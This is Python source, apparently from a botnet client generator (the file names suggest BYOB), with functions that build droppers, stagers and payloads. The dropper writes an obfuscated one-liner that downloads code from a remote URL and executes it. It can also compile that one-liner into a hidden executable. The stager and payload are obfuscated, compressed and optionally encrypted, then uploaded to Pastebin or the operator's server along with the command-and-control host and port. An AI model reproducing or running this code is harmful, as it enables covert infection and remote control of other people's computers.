def _dropper(options, **kwargs):
util.display("\n[>]", color='green', style='bright', end=',')
util.display("Dropper", color='reset', style='bright')
assert 'url' in kwargs, "missing keyword argument 'url'"
assert 'var' in kwargs, "missing keyword argument 'var'"
assert 'hidden' in kwargs, "missing keyword argument 'hidden'"
name = 'byob_{}.py'.format(
kwargs['var']) if not options.name else options.name
if not name.endswith('.py'):
name += '.py'
dropper = "import zlib,base64,marshal,urllib;exec(marshal.loads(zlib.decompress(base64.b64decode({}))))".format(
repr(
base64.b64encode(
zlib.compress(
marshal.dumps(
"import zlib,base64,marshal,urllib;exec(marshal.loads(zlib.decompress(base64.b64decode(urllib.urlopen({}).read()))))"
.format(repr(kwargs['url'])))))) if options.
compress else repr(
base64.b64encode(
zlib.compress(
marshal.dumps("urllib.urlopen({}).read()".
format(repr(kwargs['url'])))))))
with file(name, 'w') as fp:
fp.write(dropper)
if options.exe:
util.display(' Compiling executable...',
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
name = generators.exe(name, icon=options.icon, hidden=kwargs['hidden'])
__load__.set()
elif options.app:
util.display(' Bundling application...',
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
name = generators.exe(name, icon=options.icon, hidden=kwargs['hidden'])
__load__.set()
util.display('(saved to file: {})\n'.format(name),
style='dim',
color='reset')
return name
def _imports(options, **kwargs):
util.display("\n[>]", color='green', style='bright', end=',')
util.display("Imports", color='reset', style='bright')
assert 'modules' in kwargs, "missing keyword argument 'modules'"
util.display("\tAdding imports...", color='reset', style='normal', end=',')
globals()['__load__'] = threading.Event()
globals()['__spin__'] = util.spinner(__load__)
imports = set()
for module in kwargs['modules']:
for line in open(module, 'r').read().splitlines():
if len(line.split()):
if line.split()[0] == 'import':
for x in ['core'] + [
os.path.splitext(i)[0] for i in os.listdir('core')
] + [
'core.%s' % s for s in
[os.path.splitext(i)[0] for i in os.listdir('core')]
]:
if x in line:
break
else:
imports.add(line.strip())
elif len(line.split()) > 3:
if line.split()[0] == 'from' and line.split(
)[1] != '__future__' and line.split()[2] == 'import':
for x in ['core'] + [
os.path.splitext(i)[0]
for i in os.listdir('core')
] + [
'core.%s' % s for s in [
os.path.splitext(i)[0]
for i in os.listdir('core')
]
]:
if x in line.strip():
break
else:
imports.add(line.strip())
imports = list(imports)
return imports
def _modules(options, **kwargs):
util.display("\n[>]", color='green', style='bright', end=',')
util.display('Modules', color='reset', style='bright')
util.display("\tAdding modules...", color='reset', style='normal', end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
modules = [
'core/loader.py', 'core/util.py', 'core/security.py', 'core/payload.py'
]
if len(options.modules):
for m in options.modules:
if isinstance(m, str):
base = os.path.splitext(os.path.basename(m))[0]
if not os.path.exists(m):
_m = os.path.join(os.path.abspath('modules'),
os.path.basename(m))
if _m not in [
os.path.splitext(_)[0]
for _ in os.listdir('modules')
]:
util.display("[-]", color='red', style='normal')
util.display(
"can't add module: '{}' (does not exist)".format(
m),
color='reset',
style='normal')
continue
module = os.path.join(
os.path.abspath('modules'),
m if '.py' in os.path.splitext(m)[1] else '.'.join(
[os.path.splitext(m)[0], '.py']))
modules.append(module)
__load__.set()
util.display("({} modules added to client)".format(len(modules)),
color='reset',
style='dim')
return modules
def _stager(options, **kwargs):
util.display("\n[>]", color='green', style='bright', end=',')
util.display("Stager", color='reset', style='bright')
assert 'url' in kwargs, "missing keyword argument 'url'"
assert 'key' in kwargs, "missing keyword argument 'key'"
assert 'var' in kwargs, "missing keyword argument 'var'"
stager = open('core/stager.py', 'r').read() + generators.main(
'run', url=kwargs['url'], key=kwargs['key'])
if not os.path.isdir('modules/stagers'):
try:
os.mkdir('modules/stagers')
except OSError:
__logger__.debug(
"Permission denied: unable to make directory './modules/stagers/'"
)
if options.obfuscate:
util.display("\tObfuscating stager... ",
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
output = generators.obfuscate(stager)
__load__.set()
_update(stager, output, task='Obfuscation')
stager = output
if options.compress:
util.display("\tCompressing stager... ",
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
output = base64.b64encode(
zlib.compress(marshal.dumps(compile(stager, '', 'exec')), 9))
__load__.set()
_update(stager, output, task='Compression')
stager = output
util.display("\tUploading stager... ",
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
if options.pastebin:
assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
url = util.pastebin(stager, api_dev_key=options.pastebin)
else:
dirs = [
'modules/stagers', 'byob/modules/stagers',
'byob/byob/modules/stagers'
]
dirname = '.'
for d in dirs:
if os.path.isdir(d):
dirname = d
path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')
with file(path, 'w') as fp:
fp.write(stager)
s = 'http://{}:{}/{}'.format(
options.host,
int(options.port) + 1,
urllib.pathname2url(
path.replace(os.path.join(os.getcwd(), 'modules'), '')))
s = urllib2.urlparse.urlsplit(s)
url = urllib2.urlparse.urlunsplit(
(s.scheme, s.netloc, os.path.normpath(s.path), s.query,
s.fragment)).replace('\\', '/')
__load__.set()
util.display("(hosting stager at: {})".format(url),
color='reset',
style='dim')
return url
def _payload(options, **kwargs):
util.display("\n[>]", color='green', style='bright', end=',')
util.display("Payload", color='reset', style='bright')
assert 'var' in kwargs, "missing keyword argument 'var'"
assert 'modules' in kwargs, "missing keyword argument 'modules'"
assert 'imports' in kwargs, "missing keyword argument 'imports'"
payload = '\n'.join(
list(kwargs['imports']) + [
open(module, 'r').read().partition('# main')[2]
for module in kwargs['modules']
]) + generators.main(
'Payload', **{
"host": options.host,
"port": options.port,
"pastebin": options.pastebin if options.pastebin else str()
}) + '_payload.run()'
if not os.path.isdir('modules/payloads'):
try:
os.mkdir('modules/payloads')
except OSError:
__logger__.debug(
"Permission denied: unabled to make directory './modules/payloads/'"
)
if options.obfuscate:
__load__ = threading.Event()
util.display("\tObfuscating payload...",
color='reset',
style='normal',
end=',')
__spin__ = util.spinner(__load__)
output = '\n'.join([
line
for line in generators.obfuscate(payload).rstrip().splitlines()
if '=jobs' not in line
])
__load__.set()
_update(payload, output, task='Obfuscation')
payload = output
if options.compress:
util.display("\tCompressing payload... ",
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
output = generators.compress(payload)
__load__.set()
_update(payload, output, task='Compression')
payload = output
if options.encrypt:
assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
util.display("\tEncrypting payload... ".format(kwargs['key']),
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
output = generators.encrypt(payload, kwargs['key'])
__load__.set()
_update(payload, output, task='Encryption')
payload = output
util.display("\tUploading payload... ",
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = util.spinner(__load__)
if options.pastebin:
assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
url = util.pastebin(payload, api_dev_key=options.pastebin)
else:
dirs = [
'modules/payloads', 'byob/modules/payloads',
'byob/byob/modules/payloads'
]
dirname = '.'
for d in dirs:
if os.path.isdir(d):
dirname = d
path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')
with file(path, 'w') as fp:
fp.write(payload)
s = 'http://{}:{}/{}'.format(
options.host, options.port + 1,
urllib.pathname2url(
path.replace(os.path.join(os.getcwd(), 'modules'), '')))
s = urllib2.urlparse.urlsplit(s)
url = urllib2.urlparse.urlunsplit(
(s.scheme, s.netloc, os.path.normpath(s.path), s.query,
s.fragment)).replace('\\', '/')
__load__.set()
util.display("(hosting payload at: {})".format(url),
color='reset',
style='dim')
return url